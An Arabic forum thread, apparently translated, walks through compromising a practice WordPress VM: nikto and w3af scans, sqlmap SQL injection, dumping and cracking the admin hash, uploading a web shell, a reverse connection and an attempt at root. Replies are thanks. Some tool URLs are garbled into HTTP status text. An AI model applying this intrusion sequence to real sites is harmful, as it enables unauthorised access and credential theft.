1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Team TrYaG | المشاهدات : 5,098 | الردود : 11
حالة الموضوع:
مغلق
  1. Team TrYaG Active DeveloPer

    الأنتساب:
    ‏19 سبتمبر 2011
    المشاركات:
    75
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    30
    الإقامة:
    ksa
    السلام عليكم ورحمة الله وبركاتة

    اليوم ياخوان راح نشرح باذن الله
    فحص الهدف من الثغرات وحصول ثغرة sql
    واستغلالها ورفع الشل وسحب روت :

    الهدف : &:"

    hack-test.com


    في البداية نتجى لم مجلد اداة nikto

    بلباك تراك :/pentest/web/nikto

    بدعها نفحص الهدف: #:"

    perl nikto.pl -h 301 Moved Permanently

    [​IMG]

    كود PHP:
    Target IP192.168.1.2
    Target Hostnamehack-test.com
    Target Port80
    Start Time2011-12-29 06:50:03

    ---------------------------------------------------------------------------

    ServerApache/2.2.15 (Fedora)
    ETag header found on serverinode12748size1475mtime0x4996d177f5c3b
    Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
    Allowed HTTP MethodsGETHEADPOSTOPTIONSTRACE
    OSVDB-877HTTP TRACE method is activesuggesting the host is vulnerable to XST
    OSVDB-3268: /icons/: Directory indexing found.
    OSVDB-3233: /icons/READMEApache default file found.
    6448 items checked1 error(s) and 6 item(sreported on remote host
    End Time2011-12-29 06:50:37 (34 seconds)
    نجمع معلومات عن الهدف:

    بعد الانتهاء
    نروح لم اداة
    w3af
    الكل عارفها:
    مجلد الاداة
    /pentest/web/w3af

    بعد دخولنا للمجد :
    نشغل البرنامج

    ./w3af_gui

    [​IMG]

    http://resources.infosecinstitute.com/wp-content/uploads
    /010512_1633_Targetingan13.png

    الان بعد مانتهينا من الفحص
    [​IMG]

    خرجت لنا الثغرات : &:"
    اخترقنا ثغرة sql
    [​IMG]
    مثل ماهو موضح قدامك :ماكن الاصابة

    [​IMG]

    طيب الحين نتوجة لم الاداة المعروفة :
    sqlmap
    [​IMG]

    نعطية امر :
    sqlmap.py -u 404 Not Found

    لستغلال الثغرة
    [​IMG]
    [​IMG]
    [​IMG]
    [​IMG]
    هينا اخترنا وريد بريس
    [​IMG]
    معروف انو جدول اليوزر في سكريبت وريد بريس هو )2:"
    wp_user
    [​IMG]
    [​IMG]
    مثل ماشفتو تم استخراج الجداول:
    [​IMG]
    ومثل ماشفتو تم سحب باسورد الادمن :
    الحين نروح نكسر الهاش من الموقع
    http://www.onlinehashcrack.com/free-hash-reverse.php
    [​IMG]
    الحين نروح نخش الوحة
    [​IMG]
    نرفع الشل
    [​IMG]
    [​IMG]
    [​IMG]
    تم رفع الشل بنجاح :
    [​IMG]
    [​IMG]
    عملنا اتصال عكسي
    [​IMG]
    [​IMG]

    نشوف صلاحيتنا :id

    uid=48(apache) gid=489(apache) groups=489(apache)

    مسارنا : pwd

    /var/www/html/Hackademic_RTB1/wp-content/plugins

    uname -a

    اصدال الكيرنل

    Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux

    [​IMG]

    الحين نروح نسحب لوكل روت :عشان نسحب روت [​IMG]

    [​IMG]

    الى هنا اخواني :ملاحضة بسيطة الشرح شرح اجنبي ورتبته لكم :عشان الافادة )4:"

     
    3 شخص معجب بهذا.
  2. Al-JoKeR مساعد مشرف

    الأنتساب:
    ‏22 ديسمبر 2011
    المشاركات:
    133
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    50
    الوظيفة:
    طالب علم
    الإقامة:
    الجنة ان شاء الله
    رد: استهداف موقع :فحصة :اختراقة برايفت

    ماشاء الله موضوع متكامل

    تستحق التقيم

    )5:"
     
  3. KaBriMO Developer

    الأنتساب:
    ‏14 يوليو 2012
    المشاركات:
    39
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    المغرب
    نظام التشغيل:
    Linux
    رد: استهداف موقع :فحصة :اختراقة برايفت

    موضوع قيــم باارك الله فيك .. وتم تقييمك ++
     
  4. Dr.aL-jArH DeveloPer Plus

    الأنتساب:
    ‏24 أغسطس 2012
    المشاركات:
    140
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    رد: استهداف موقع :فحصة :اختراقة برايفت


    بارك الله فيك:{11}:
     
  5. βuŦŦεя ƒℓY Developer

    الأنتساب:
    ‏19 يناير 2012
    المشاركات:
    30
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    TaiF CiTy
    رد: استهداف موقع :فحصة :اختراقة برايفت

    جزاك الله خير
     
  6. a7mdrat Developer

    الأنتساب:
    ‏7 أغسطس 2012
    المشاركات:
    31
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    رد: استهداف موقع :فحصة :اختراقة برايفت


    ~ :. الله يعـطيكّـَ الف عـأفيَـه .: ~

    &:":
     
  7. Dr.aL-jArH DeveloPer Plus

    الأنتساب:
    ‏24 أغسطس 2012
    المشاركات:
    140
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    رد: استهداف موقع :فحصة :اختراقة برايفت

    جزاك الله خيير اخوي الغالي على الطرح الرائع

    سلمت يدينك يا طيب ​
     
  8. aL Musli Developer

    الأنتساب:
    ‏21 يوليو 2012
    المشاركات:
    74
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الوظيفة:
    seo
    الإقامة:
    الموصل الحدباء
    رد: استهداف موقع :فحصة :اختراقة برايفت

    يعطيك العافيه اخوي
     
  9. мя.ωℓσ Developer

    الأنتساب:
    ‏23 يونيو 2012
    المشاركات:
    49
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    30
    الوظيفة:
    Unemployed
    الإقامة:
    ..| ღ |..
    نظام التشغيل:
    windows 7
    رد: استهداف موقع :فحصة :اختراقة برايفت

    درس رائع وجميل جدا​
     
  10. مجنون الاختراقات Developer

    الأنتساب:
    ‏15 يوليو 2012
    المشاركات:
    36
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    .. [ KSA ]..
    رد: استهداف موقع :فحصة :اختراقة برايفت

    يع ـطيك الف عافيهَِ , $:"​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة